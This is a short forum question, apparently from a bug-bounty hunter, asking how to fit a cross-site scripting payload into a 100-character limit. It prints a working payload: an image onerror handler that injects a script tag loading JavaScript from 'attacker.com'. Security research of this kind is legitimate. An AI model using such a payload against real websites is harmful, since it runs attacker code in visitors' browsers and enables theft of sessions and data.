# What is the shortest code to load js dynamically

Tags: xss, short

I found a xss vulnerability on a website and want to exploit it for bug bounty. the problem: maximal 100 Characters and i want to load external javscript. There is no jquery on the website.

This is the shortest xss to load external javascript i found but its 114 characters. Is it possbile to get a shorter code? yes i know the url could be shorter but thats the only thing. i tried everything.

```
<img src onerror="var d=document,s=d.createElement`script`;s.src='//attacker.com',d.querySelector`p`.appendChild(s)">
```

Comment: its mroe thann 114 charcaters because the url* but i have a shorter one